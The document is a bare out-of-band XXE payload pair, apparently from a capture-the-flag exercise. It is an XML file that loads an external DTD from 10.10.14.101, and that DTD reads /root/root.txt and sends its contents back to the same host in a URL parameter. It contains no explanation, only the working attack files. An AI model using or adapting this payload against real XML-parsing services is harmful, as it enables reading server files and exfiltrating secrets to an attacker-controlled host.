- kavi_creds.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM 'http://10.10.14.101/kavi.dtd'> %xxe;]>
<credits>
<author>&xxe;</author>
</credits>
- kavi.dtd
<!ENTITY % file SYSTEM "file:///root/root.txt">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://10.10.14.101/?flag=%file;'>">
%eval;
%exfiltrate;